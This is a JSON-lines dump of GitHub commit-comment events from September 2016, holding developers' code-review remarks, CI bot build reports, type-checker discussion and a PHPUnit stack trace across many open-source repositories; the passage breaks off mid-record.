{"id":"4585812916","type":"CommitCommentEvent","actor":{"login":"CaMer0n"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":19085416,"position":null,"line":null,"path":null,"commit_id":"d075e4807e16e36a851ada40d28471fcdfbc34eb","created_at":"2016-09-19T20:45:35Z","updated_at":"2016-09-19T20:45:35Z","body":"No worries. Thank YOU @MikeyGMT ! :+1: "}},"created_at":"2016-09-19T20:45:35Z"}
{"id":"4585813317","type":"CommitCommentEvent","actor":{"login":"ChristianGeorgiev"},"repo":{"name":"CodingGroup/test-repo"},"payload":{"comment":{"id":19085417,"position":null,"line":null,"path":null,"commit_id":"9ff47236aa6a081e40efc84d7d1b7f699acfec3a","created_at":"2016-09-19T20:45:39Z","updated_at":"2016-09-19T20:45:39Z","body":"Искам 9200 лв. заплата иначе напускам!!!"}},"created_at":"2016-09-19T20:45:39Z"}
{"id":"4585814327","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085421,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T20:45:50Z","updated_at":"2016-09-19T20:45:50Z","body":"Oh gosh, was that generated automatically??? Ö\n\nAm 19.09.2016 um 22:43 schrieb Roberto M.F.:\n> Oh, you should probably report that bug to autonome/silobuster\n> <https://github.com/autonome/silobuster/issues>, ;)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/WeAreFairphone/fprsmap/commit/68078838af1f026f4c987e48404f53714dccf1c3#commitcomment-19085395>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIiMgYWpGDMEggDi781VGE7Jlh1TveG_ks5qrvPtgaJpZM4KA4FH>.\n>\n"}},"created_at":"2016-09-19T20:45:50Z"}
{"id":"4585816880","type":"CommitCommentEvent","actor":{"login":"haganbt"},"repo":{"name":"haganbt/pepp"},"payload":{"comment":{"id":19085429,"position":54,"line":142,"path":"lib/queue.js","commit_id":"9c12095339b239b57e96e7468d006a00d8c5140f","created_at":"2016-09-19T20:46:18Z","updated_at":"2016-09-19T20:46:18Z","body":"@samaybar - what is this used for?"}},"created_at":"2016-09-19T20:46:18Z"}
{"id":"4585817172","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19085431,"position":55,"line":55,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:46:22Z","updated_at":"2016-09-19T20:46:22Z","body":"Either way, `removeFromCart` should return a promise meaning successful removal. You can do that in the `else` case using `return $q.resolve(cart)` or similar."}},"created_at":"2016-09-19T20:46:22Z"}
{"id":"4585818799","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085434,"position":23,"line":22,"path":"index.html","commit_id":"5886c2c518ed88809711fea960f4150453228fd3","created_at":"2016-09-19T20:46:41Z","updated_at":"2016-09-19T20:46:41Z","body":"Yes, yes it works. I meat that I uploaded a smaller picture only to test, because I didn't have the bigger one, :)"}},"created_at":"2016-09-19T20:46:41Z"}
{"id":"4585819083","type":"CommitCommentEvent","actor":{"login":"fmapilis"},"repo":{"name":"theniall/babylon"},"payload":{"comment":{"id":19085435,"position":16,"line":14,"path":"content/auditpage.js","commit_id":"87c987ebaebc1210cfb69379225a1e9c007ae519","created_at":"2016-09-19T20:46:44Z","updated_at":"2016-09-19T20:46:44Z","body":"This is bad, as well as line 17 which does the same thing to `afterData`.\r\n\r\nI'll leave it as an exercise to you to figure out why this is incorrect. If `beforeData` _is_ an empty string, you _should_ be changing it to something else, but `\"Blank\"` will cause errors.\r\n\r\nTake a look at [my hastToJson function](https://github.com/theniall/babylon/commit/839b33fb6aa35524624d10c97e60d1719327f4c8#diff-9176e32c280f160df6a5be5d3d24ea32R32) clearly."}},"created_at":"2016-09-19T20:46:44Z"}
{"id":"4585820592","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"midwan/uae4arm-rpi"},"payload":{"comment":{"id":19085438,"position":null,"line":null,"path":null,"commit_id":"cb9f950f6eaad6a0f1e1a5ef8d8d419854cc7235","created_at":"2016-09-19T20:47:02Z","updated_at":"2016-09-19T20:47:02Z","body":"This fixes #9 (keyboard Navigation issue)"}},"created_at":"2016-09-19T20:47:02Z"}
{"id":"4585820926","type":"CommitCommentEvent","actor":{"login":"FraSanta89"},"repo":{"name":"FraSanta89/sideProject"},"payload":{"comment":{"id":19085439,"position":52,"line":0,"path":"utils.py","commit_id":"98eb65fa496a3005e89fdef63e88e475ee4e3b76","created_at":"2016-09-19T20:47:06Z","updated_at":"2016-09-19T20:47:06Z","body":"Remove line after testing "}},"created_at":"2016-09-19T20:47:06Z"}
{"id":"4585823941","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"CMDA/Frontend-3"},"payload":{"comment":{"id":19085445,"position":null,"line":null,"path":null,"commit_id":"97742c46dea86ec85035c2f513160f33191e2602","created_at":"2016-09-19T20:47:37Z","updated_at":"2016-09-19T20:47:37Z","body":"👌"}},"created_at":"2016-09-19T20:47:37Z"}
{"id":"4585824512","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19085446,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T20:47:43Z","updated_at":"2016-09-19T20:47:43Z","body":"```Python\r\na = A()   # type: A\r\n_ = a + 1  # type: int\r\n_ = a + \"a\"  # rejected anyway\r\n\r\nb = B()  # type: B\r\n_ = b + 1  # type: int\r\n_ = b + \"a\"  # type: str\r\n\r\nab = B()  # type: A\r\n_ = ab + 1  # type: int, which is what happens at runtime\r\n_ = ab + \"a\"  # type: int. false at runtime, but it is rejected anyway.\r\n```\r\nAre there any more possibilities?"}},"created_at":"2016-09-19T20:47:43Z"}
{"id":"4585837045","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19085470,"position":38,"line":1367,"path":"FHEM/00_SIGNALduino.pm","commit_id":"86f6fdb810699ad68560c7aa70954429b5e2607c","created_at":"2016-09-19T20:49:54Z","updated_at":"2016-09-19T20:49:54Z","body":"Ja, okay. Ich war etwas von Nachrichten und Simulieren verwirrt."}},"created_at":"2016-09-19T20:49:54Z"}
{"id":"4585837547","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085472,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T20:50:00Z","updated_at":"2016-09-19T20:50:00Z","body":"Yes, of course! I mentioned the tool on the PR (#22), hahaha"}},"created_at":"2016-09-19T20:50:00Z"}
{"id":"4585839107","type":"CommitCommentEvent","actor":{"login":"Tony-the-tiger"},"repo":{"name":"Tony-the-tiger/turbo-parakeet"},"payload":{"comment":{"id":19085474,"position":null,"line":null,"path":null,"commit_id":"ce5a24da1770441a418ccb0adbe86d274c2b3317","created_at":"2016-09-19T20:50:17Z","updated_at":"2016-09-19T20:50:17Z","body":"I want to create a log in page right here."}},"created_at":"2016-09-19T20:50:17Z"}
{"id":"4585842180","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19085481,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T20:50:50Z","updated_at":"2016-09-19T20:50:50Z","body":"yep, lulz. but you are tailoring it to .net managed code. No bueno"}},"created_at":"2016-09-19T20:50:50Z"}
{"id":"4585843957","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085488,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T20:51:10Z","updated_at":"2016-09-19T20:51:10Z","body":"This is the one - I typed wrongly\r\n(?=.*UnitedStates.)(?=.*Arkansas.)^(?!.*Rogers.)(?=.*bo.)(?=.*all)"}},"created_at":"2016-09-19T20:51:10Z"}
{"id":"4585848873","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19085499,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T20:52:02Z","updated_at":"2016-09-19T20:52:02Z","body":"We're better off doing this check in doorGetFriends.sqf and plotGetFriends.sqf. We don't need any more checks slowing down the server_monitor loop."}},"created_at":"2016-09-19T20:52:02Z"}
{"id":"4585850676","type":"CommitCommentEvent","actor":{"login":"cxj"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19085504,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-19T20:52:22Z","updated_at":"2016-09-19T20:52:22Z","body":"This commit appears to have broken some working templates in my project.  I'm investigating it now."}},"created_at":"2016-09-19T20:52:22Z"}
{"id":"4585852253","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085506,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-19T20:52:37Z","updated_at":"2016-09-19T20:52:37Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-MacOS-10.9-clang: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T20:52:37Z"}
{"id":"4585853769","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085513,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T20:52:52Z","updated_at":"2016-09-19T20:52:52Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-19T20:52:52Z"}
{"id":"4585854273","type":"CommitCommentEvent","actor":{"login":"haganbt"},"repo":{"name":"haganbt/pepp"},"payload":{"comment":{"id":19085515,"position":12,"line":137,"path":"lib/queue.js","commit_id":"9c12095339b239b57e96e7468d006a00d8c5140f","created_at":"2016-09-19T20:52:57Z","updated_at":"2016-09-19T20:52:57Z","body":"@samaybar - this logging needs to be cleaned up. I would suggest just a single entry using trace level."}},"created_at":"2016-09-19T20:52:57Z"}
{"id":"4585854428","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085517,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T20:52:59Z","updated_at":"2016-09-19T20:52:59Z","body":"After ?=. i'm adding * (asterisk) too. Its not reflected in regex what i'm typing here"}},"created_at":"2016-09-19T20:52:59Z"}
{"id":"4585858484","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085526,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T20:53:43Z","updated_at":"2016-09-19T20:53:43Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T20:53:43Z"}
{"id":"4585859847","type":"CommitCommentEvent","actor":{"login":"mmd-osm"},"repo":{"name":"estadtherr/Overpass-API"},"payload":{"comment":{"id":19085529,"position":null,"line":null,"path":null,"commit_id":"4374a34881ac5cfc57614b5f5127b987f6981dfe","created_at":"2016-09-19T20:53:58Z","updated_at":"2016-09-19T20:53:58Z","body":"@estadtherr: can you create a pull request for this? "}},"created_at":"2016-09-19T20:53:58Z"}
{"id":"4585860259","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"G620S-HUAWEI/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":19085530,"position":null,"line":null,"path":null,"commit_id":"7053ff3d412044b75b493fee4be2081a117a9406","created_at":"2016-09-19T20:54:02Z","updated_at":"2016-09-19T20:54:02Z","body":"https://github.com/XileForce/Vindicator-S6-Test/commit/ac4f1ebe2baa7df5a9b2a1e34927bca38ffb7611"}},"created_at":"2016-09-19T20:54:02Z"}
{"id":"4585862758","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085536,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T20:54:29Z","updated_at":"2016-09-19T20:54:29Z","body":"After each ?=. and ?!. adding *"}},"created_at":"2016-09-19T20:54:29Z"}
{"id":"4585863190","type":"CommitCommentEvent","actor":{"login":"Goddessii"},"repo":{"name":"Goddessii/HELLO-WORLD"},"payload":{"comment":{"id":19085537,"position":null,"line":null,"path":null,"commit_id":"e36483d6d6b55036aaf1779dae9af74cabca6705","created_at":"2016-09-19T20:54:33Z","updated_at":"2016-09-19T20:54:33Z","body":"hi my name is Eileen I'm new here  and ready to learn "}},"created_at":"2016-09-19T20:54:33Z"}
{"id":"4585863833","type":"CommitCommentEvent","actor":{"login":"arjenvanderende"},"repo":{"name":"Fundynamic/dune2themaker4j"},"payload":{"comment":{"id":19085542,"position":18,"line":19,"path":"src/main/java/com/fundynamic/d2tm/utils/Colors.java","commit_id":"e37ba208c0f48f657d83635ed6cf6f6eae900be1","created_at":"2016-09-19T20:54:39Z","updated_at":"2016-09-19T20:54:39Z","body":"💸 Cashes vs. Caches 💸"}},"created_at":"2016-09-19T20:54:39Z"}
{"id":"4585864020","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085544,"position":23,"line":22,"path":"index.html","commit_id":"5886c2c518ed88809711fea960f4150453228fd3","created_at":"2016-09-19T20:54:41Z","updated_at":"2016-09-19T20:54:41Z","body":"Yeah, I didn't resize the matrix background at first and only made the star smaller, so the resulting image wasn't any bigger as the one that I uploaded in the forum.\r\n\r\nI had to enlarge the background a bit to have a resulting 300x300 image because the letters would have been to small else."}},"created_at":"2016-09-19T20:54:41Z"}
{"id":"4585865342","type":"CommitCommentEvent","actor":{"login":"kehollin"},"repo":{"name":"kehollin/paco"},"payload":{"comment":{"id":19085548,"position":null,"line":null,"path":null,"commit_id":"26fcd5fa7a70f00fd385880f50d6d21f9e4e9ca6","created_at":"2016-09-19T20:54:56Z","updated_at":"2016-09-19T20:54:56Z","body":"Weird, Eclipse seems to have decided to put the /gen path in a random new location. Thanks Eclipse! (Will be reverting on a subsequent commit)."}},"created_at":"2016-09-19T20:54:56Z"}
{"id":"4585865747","type":"CommitCommentEvent","actor":{"login":"mike-tinyco"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19085550,"position":31,"line":34,"path":"cocos/platform/ios/BPCHelper-ios.mm","commit_id":"e12663c47d069ea89d106c9085d9bd50188bf840","created_at":"2016-09-19T20:55:01Z","updated_at":"2016-09-19T20:55:01Z","body":"We need to make a note of this for later but this is really only checking >= iOS10+."}},"created_at":"2016-09-19T20:55:01Z"}
{"id":"4585868343","type":"CommitCommentEvent","actor":{"login":"bsekisser"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":19085561,"position":null,"line":null,"path":null,"commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-19T20:55:25Z","updated_at":"2016-09-19T20:55:25Z","body":"scratch that...  went away... crs took over.  I THOUGHT (and what I thought I remembered) I had figured out the initial timer setup issues... ugh!"}},"created_at":"2016-09-19T20:55:25Z"}
{"id":"4585870594","type":"CommitCommentEvent","actor":{"login":"haganbt"},"repo":{"name":"haganbt/pepp"},"payload":{"comment":{"id":19085569,"position":24,"line":64,"path":"lib/queue.js","commit_id":"7aca07f4fc7571c614aa49d26e50c7610daf8a06","created_at":"2016-09-19T20:55:49Z","updated_at":"2016-09-19T20:55:49Z","body":"@samaybar - this code style makes it very hard to read. You should use the same style as other else blocks e.g. \r\n\r\n```\r\n} else {\r\n```\r\n\r\nWill enable linting."}},"created_at":"2016-09-19T20:55:49Z"}
{"id":"4585872238","type":"CommitCommentEvent","actor":{"login":"jeaye"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19085573,"position":31,"line":34,"path":"cocos/platform/ios/BPCHelper-ios.mm","commit_id":"e12663c47d069ea89d106c9085d9bd50188bf840","created_at":"2016-09-19T20:56:08Z","updated_at":"2016-09-19T20:56:08Z","body":"Good call. I'm gonna change the function name to protect us from future fuck ups."}},"created_at":"2016-09-19T20:56:08Z"}
{"id":"4585874604","type":"CommitCommentEvent","actor":{"login":"haganbt"},"repo":{"name":"haganbt/pepp"},"payload":{"comment":{"id":19085578,"position":7,"line":53,"path":"lib/queue.js","commit_id":"7aca07f4fc7571c614aa49d26e50c7610daf8a06","created_at":"2016-09-19T20:56:30Z","updated_at":"2016-09-19T20:56:30Z","body":"@samaybar - this needs cleaning up."}},"created_at":"2016-09-19T20:56:30Z"}
{"id":"4585879849","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085591,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-19T20:57:23Z","updated_at":"2016-09-19T20:57:23Z","body":"input_processor_refactor (mbadams5) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.64%25-red.svg)</a> \n"}},"created_at":"2016-09-19T20:57:23Z"}
{"id":"4585888183","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19085607,"position":22,"line":452,"path":"chrome/browser/net/blockers/blockers_worker.cc","commit_id":"94405c33b6f81a16da881032978ce92480e9dab2","created_at":"2016-09-19T20:58:50Z","updated_at":"2016-09-19T20:58:50Z","body":"sorry i forgot the `to:` rule can contain `$n`"}},"created_at":"2016-09-19T20:58:50Z"}
{"id":"4585888490","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085609,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T20:58:53Z","updated_at":"2016-09-19T20:58:53Z","body":"Yes, I got that you used autonome/silobuster to generate the meta tags, but I couldn't believe that nobody has found out about the wrong tag endings! Ö"}},"created_at":"2016-09-19T20:58:53Z"}
{"id":"4585888863","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085610,"position":25,"line":48,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T20:58:57Z","updated_at":"2016-09-19T20:58:57Z","body":"Should be \r\n```java\r\n@return The hotbar\r\n```\r\naccording to Sponge code style."}},"created_at":"2016-09-19T20:58:57Z"}
{"id":"4585891124","type":"CommitCommentEvent","actor":{"login":"MarcelRaad"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19085617,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T20:59:21Z","updated_at":"2016-09-19T20:59:21Z","body":"@noloader Thanks, I'll try to find the affected Boost sublibraries missing explicit clang checks tomorrow, but IIRC, they were all over the place.\r\n\r\nYes, the Boost bugtracker is very old and bad, not even recent Internet Explorer versions will display the captchas anymore except in super-unsafe mode. There was a discussion about updating it on the Boost mailing list a few months ago, but I think the outcome was that noone had root access to the server anymore or something like that :-("}},"created_at":"2016-09-19T20:59:21Z"}
{"id":"4585891403","type":"CommitCommentEvent","actor":{"login":"JukkaL"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19085621,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T20:59:23Z","updated_at":"2016-09-19T20:59:23Z","body":"Some of these may be false positives. I think that the case which is unsafe is something like this:\r\n\r\n```\r\nclass A:\r\n    def __add__(self, x: int) -> int: pass\r\n\r\nclass B(A):\r\n    @overload  # E: Signature of \"__add__\" incompatible with supertype \"A\"\r\n    def __add__(self, x: int) -> int: pass\r\n    @overload\r\n    def __add__(self, x: 'C') -> str: pass\r\n\r\nclass C:\r\n    def __radd__(self, x: A) -> float: ...\r\n\r\ndef f(a: A) -> float:\r\n    return a + C()  # okay?\r\n\r\nf(B())  # ouch, returns str, not float\r\n```\r\n\r\n(Didn't verify if that actually misbehaves, but IIRC the unsoudness is something like that.)"}},"created_at":"2016-09-19T20:59:23Z"}
{"id":"4585893147","type":"CommitCommentEvent","actor":{"login":"jeaye"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19085625,"position":31,"line":34,"path":"cocos/platform/ios/BPCHelper-ios.mm","commit_id":"e12663c47d069ea89d106c9085d9bd50188bf840","created_at":"2016-09-19T20:59:42Z","updated_at":"2016-09-19T20:59:42Z","body":"https://github.com/brooklynpacket/marvel/commit/70c0363009ee5bf51696b93660cf5c8b5bbe7c15"}},"created_at":"2016-09-19T20:59:42Z"}
{"id":"4585895115","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19085630,"position":null,"line":null,"path":null,"commit_id":"47d00bcede8acca40a2243157f4dfdb35c6ab8de","created_at":"2016-09-19T21:00:03Z","updated_at":"2016-09-19T21:00:03Z","body":"So beacon and probe were pretty much the same packet, other than the ethernet frame ?"}},"created_at":"2016-09-19T21:00:03Z"}
{"id":"4585898341","type":"CommitCommentEvent","actor":{"login":"ltGuillaume"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":19085638,"position":null,"line":null,"path":null,"commit_id":"9ad6488b890470368ae5714062cb7200bc166c95","created_at":"2016-09-19T21:00:35Z","updated_at":"2016-09-19T21:00:35Z","body":"I'm afraid this will show the albums per-artist in a completely random order."}},"created_at":"2016-09-19T21:00:35Z"}
{"id":"4585906073","type":"CommitCommentEvent","actor":{"login":"sanderux"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19085654,"position":5,"line":76,"path":"src/modules/navigator/mission.cpp","commit_id":"84fa1dc4816b3d6a90cf0d02bf4d8d1c30b511af","created_at":"2016-09-19T21:01:54Z","updated_at":"2016-09-19T21:01:54Z","body":"maybe NAV_FORCE_VTOL considering it will also force vertical land"}},"created_at":"2016-09-19T21:01:54Z"}
{"id":"4585907005","type":"CommitCommentEvent","actor":{"login":"cxj"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19085656,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-19T21:02:03Z","updated_at":"2016-09-19T21:02:03Z","body":"Two unit tests fail with following stack traces:\r\n\r\n**tests/ErrorTest.php**\r\nPHPUnit 4.7.6 by Sebastian Bergmann and contributors.\r\n\r\nRuntime:\tPHP 5.6.25 with Xdebug 2.3.3\r\nConfiguration:\t/Users/chris/tmp/Transphporm/phpunit.xml\r\n\r\n\r\nFatal error: Call to undefined method ErrorTest::expectException() in /Users/chris/tmp/Transphporm/tests/ErrorTest.php on line 5\r\n\r\nCall Stack:\r\n    0.0157     681144   1. {main}() /usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar:0\r\n    0.0817   13075872   2. PHPUnit_TextUI_Command::main() /usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar:537\r\n    0.0817   13076496   3. PHPUnit_TextUI_Command->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/Command.php:99\r\n    0.1272   13239808   4. PHPUnit_TextUI_TestRunner->doRun() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/Command.php:147\r\n    0.1320   13251200   5. PHPUnit_Framework_TestSuite->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/TestRunner.php:428\r\n    0.1387   13256576   6. PHPUnit_Framework_TestCase->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestSuite.php:738\r\n    0.1388   13258216   7. PHPUnit_Framework_TestResult->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:702\r\n    0.1388   13260936   8. PHPUnit_Framework_TestCase->runBare() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestResult.php:601\r\n    0.1395   13303552   9. PHPUnit_Framework_TestCase->runTest() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:746\r\n    0.1396   13304312  10. ReflectionMethod->invokeArgs() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:881\r\n    0.1396   13304416  11. ErrorTest->testNoTSSRules() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:881\r\n\r\n**tests/PseudoTest.php**\r\nPHPUnit 4.7.6 by Sebastian Bergmann and contributors.\r\n\r\nRuntime:\tPHP 5.6.25 with Xdebug 2.3.3\r\nConfiguration:\t/Users/chris/tmp/Transphporm/phpunit.xml\r\n\r\n...\r\nFatal error: Class 'Foo' not found in /Users/chris/tmp/Transphporm/tests/PseudoTest.php on line 173\r\n\r\nCall Stack:\r\n    0.0157     681144   1. {main}() /usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar:0\r\n    0.0832   13075872   2. PHPUnit_TextUI_Command::main() /usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar:537\r\n    0.0832   13076496   3. PHPUnit_TextUI_Command->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/Command.php:99\r\n    0.1328   13331336   4. PHPUnit_TextUI_TestRunner->doRun() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/Command.php:147\r\n    0.1376   13342832   5. PHPUnit_Framework_TestSuite->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/TextUI/TestRunner.php:428\r\n    0.1828   14281400   6. PHPUnit_Framework_TestCase->run() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestSuite.php:738\r\n    0.1829   14281400   7. PHPUnit_Framework_TestResult->run() 